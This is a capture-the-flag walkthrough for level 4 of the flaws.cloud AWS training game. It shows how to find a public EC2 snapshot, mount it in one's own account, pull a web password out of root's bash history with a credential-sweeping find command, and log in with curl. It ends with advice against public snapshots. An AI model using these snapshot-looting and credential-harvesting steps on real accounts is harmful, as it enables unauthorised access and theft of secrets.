Level 4

A CTF walkthrough for level 4 of Flaws.Cloud

Discovering a Public EC2 Snapshot

In the previous level, we identified the entry point for Level 4: 4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud. Upon navigating to this site, we're prompted for a login.

The previous level also hinted: "It'll be useful to know that a snapshot was made of that EC2 shortly after nginx was setup on it."

Our cloudfox results didn't contain any info about EC2 snapshots (a reminder not to rely solely on tools), but we can check ourselves, assuming the backup user has permission to do so.

aws --profile flaws ec2 describe-snapshots --query "Snapshots[?contains(OwnerId, '975426262029')]"

[
    {
        "Description": "",
        "Encrypted": false,
        "OwnerId": "975426262029",
        "Progress": "100%",
        "SnapshotId": "snap-0b49342abd1bdcb89",
        "StartTime": "2017-02-28T01:35:12+00:00",
        "State": "completed",
        "VolumeId": "vol-04f1c039bc13ea950",
        "VolumeSize": 8,
        "Tags": [
            {
                "Key": "Name",
                "Value": "flaws backup 2017.02.27"
            }
        ],
        "StorageTier": "standard"
    }
]

Nice! This is a public snapshot, meaning we can load it into our own AWS account and enumerate it.
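Before importing it, we can confirm the snapshot really is public by checking its createVolumePermission attribute; a public snapshot lists the group all. A quick sketch:

```shell
# A public snapshot's createVolumePermission attribute contains the
# group "all". (|| true keeps the sketch runnable outside an AWS session.)
SNAPSHOT_ID="snap-0b49342abd1bdcb89"
aws --profile flaws ec2 describe-snapshot-attribute \
    --snapshot-id "$SNAPSHOT_ID" \
    --attribute createVolumePermission || true
```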

Enumerating a Public EC2 Snapshot

Creating a Volume from Snapshot

We can quickly create an EC2 Volume from this Snapshot with the following command (or this can be done in the AWS console).

aws --profile dev ec2 create-volume --availability-zone us-west-2a --region us-west-2 --snapshot-id snap-0b49342abd1bdcb89
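Optionally, the new volume's ID can be captured and polled until it's ready to attach; a sketch using the same dev profile:

```shell
# Create the volume, capture its ID, and wait until it's "available".
# (|| true keeps the sketch runnable outside an AWS session.)
REGION="us-west-2"
VOLUME_ID=$(aws --profile dev ec2 create-volume \
    --availability-zone us-west-2a --region "$REGION" \
    --snapshot-id snap-0b49342abd1bdcb89 \
    --query VolumeId --output text || true)
aws --profile dev ec2 wait volume-available \
    --region "$REGION" --volume-ids "$VOLUME_ID" || true
```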

Creating an EC2 and Attaching the Volume

Next, we need to spin up an EC2 instance and attach this volume to it. Make sure the instance is in the same Availability Zone as the volume, in this case us-west-2a. Also, take note of the device name used when attaching (here, /dev/sdb).
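These console steps can also be scripted; a sketch where the AMI ID, volume ID, and key pair name are placeholders you'd replace with your own values:

```shell
# Launch a t2.micro in the same AZ as the volume (us-west-2a), then
# attach the restored volume as /dev/sdb. The AMI ID, volume ID, and
# key pair name below are placeholders.
# (|| true keeps the sketch runnable outside an AWS session.)
DEVICE="/dev/sdb"
INSTANCE_ID=$(aws --profile dev ec2 run-instances \
    --region us-west-2 --placement AvailabilityZone=us-west-2a \
    --image-id ami-xxxxxxxxxxxxxxxxx --instance-type t2.micro \
    --key-name my-key-pair \
    --query 'Instances[0].InstanceId' --output text || true)
aws --profile dev ec2 wait instance-running \
    --region us-west-2 --instance-ids "$INSTANCE_ID" || true
aws --profile dev ec2 attach-volume --region us-west-2 \
    --volume-id vol-xxxxxxxxxxxxxxxxx \
    --instance-id "$INSTANCE_ID" --device "$DEVICE" || true
```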

Mounting the Volume

Connect to your new instance (SSH, SSM, EC2 Instance Connect, etc.).

ssh -i ~/Downloads/tyler-flaws.pem ec2-user@ec2-34-213-130-176.us-west-2.compute.amazonaws.com

We need to mount our volume. Let's search for it.

[ec2-user@ip-172-31-33-199 ~]$ lsblk

xvda      202:0    0   8G  0 disk 
├─xvda1   202:1    0   8G  0 part /
├─xvda127 259:0    0   1M  0 part 
└─xvda128 259:1    0  10M  0 part /boot/efi
xvdb      202:16   0   8G  0 disk 
└─xvdb1   202:17   0   8G  0 part 

As you can see, /dev/sdb isn't listed here; when attaching a volume, the console warns that newer Linux kernels may rename your devices. Not to worry, we can confirm the right disk with this command.

[ec2-user@ip-172-31-33-199 ~]$ sudo file -s /dev/sdb

/dev/sdb: symbolic link to xvdb

Alright, so we need to mount the partition xvdb1, and then we can navigate into it.

[ec2-user@ip-172-31-33-199 ~]$ sudo mkdir /data
[ec2-user@ip-172-31-33-199 ~]$ sudo mount /dev/xvdb1 /data
[ec2-user@ip-172-31-33-199 ~]$ cd /data

Enumerating the Volume

Eventually, I discovered credentials for the webserver in root's bash history.

[ec2-user@ip-172-31-33-199 data]$ sudo cat root/.bash_history

echo dog | htpasswd -p /etc/nginx/.htpasswd -b flaws
htpasswd -p /etc/nginx/.htpasswd -b flaws dpg
htpasswd -b -p /etc/nginx/.htpasswd flaws dpg
htpasswd -b /etc/nginx/.htpasswd flaws nCP8xigdjpjyiXgJ7nJu7rw5Ro68iE8M
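The history file isn't the only place worth checking. A small helper (a sketch; run it with root privileges on the instance) sweeps a mounted volume for other files that commonly hold credentials:

```shell
# Sweep a mounted volume for files that commonly hold credentials:
# htpasswd files, shell histories, and private keys.
search_creds() {
    find "$1" -maxdepth 4 \
        \( -name ".htpasswd" -o -name "*_history" -o -name "*.pem" \) \
        2>/dev/null
}
search_creds /data || true  # /data only exists on the instance
```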

Let's see if they're still active! We need to navigate back to the website at http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/ and attempt to log in.
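The credentials can also be tested straight from the terminal, sending the username and the last password from the history above as HTTP basic auth:

```shell
# -u sends HTTP basic auth; -I requests headers only, so a 200 (rather
# than a 401) confirms the credentials are still valid.
USER_NAME="flaws"
PASSWORD="nCP8xigdjpjyiXgJ7nJu7rw5Ro68iE8M"
curl -I -u "$USER_NAME:$PASSWORD" \
    http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/ \
    || true  # tolerate running off-network
```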

Gaining Access to the Server

We're successful and we find the entry point for Level 5!


In Level 4, we discovered a public EC2 snapshot in the account. After creating a volume from it in our own account, we attached it to an EC2 instance, enumerated the volume, and discovered credentials for the server. Using these credentials, we successfully logged in and discovered Level 5's entry point.

It's important to ensure snapshots are not made public unless there is an intended reason to do so. Additionally, snapshots shouldn't contain sensitive data such as credentials, since anyone in the world can access a public snapshot.
